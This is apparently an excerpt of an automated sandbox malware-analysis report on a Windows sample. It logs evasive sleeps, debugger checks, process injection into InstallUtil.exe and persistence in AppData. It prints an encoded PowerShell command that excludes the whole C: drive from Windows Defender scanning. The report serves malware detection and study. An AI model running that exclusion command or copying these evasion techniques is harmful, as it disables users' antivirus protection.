Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040D26E Sleep,ExitProcess,

17_2_0040D26E

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe TID: 5096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 6616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe TID: 3488	Thread sleep time: -922337203685477s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Last function: Thread delayed

Contains functionality to enumerate running services

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

17_2_00416FC6

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6076			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1160			Jump to behavior

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406571

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

API call chain: ExitProcess graph end node

Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: powershell.exe, 00000003.00000003.515907401.000000000509E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040620E FindFirstFileW,FindNextFileW,	17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044A569 FindFirstFileExA,	17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00406EEF

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_0040CE58

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0043F394 mov eax, dword ptr fs:[00000030h]

17_2_0043F394

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

17_2_00431347

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0040F87E SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

17_2_0040F87E

Enables debug privileges

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431495 SetUnhandledExceptionFilter,	17_2_00431495
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00431347 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00431347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00438462 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	17_2_00438462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0043190C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	17_2_0043190C

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: Base64 decoded Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: Base64 decoded Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:\'			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

17_2_00414EA8

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe

17_2_0040FC77

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXAAnAA==	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Contains functionality to simulate mouse events

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00415E25 mouse_event,

17_2_00415E25

Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager2ee70d
Source: InstallUtil.exe, 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044E084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_0044E1AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044E2B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044E381
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoA,	17_2_0040D39C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_00444444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,	17_2_0044492D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	17_2_0044DA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DCC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DD0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: EnumSystemLocalesW,	17_2_0044DDA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_0044DE34

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Users\user\Desktop\kyFBQxVbsg.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
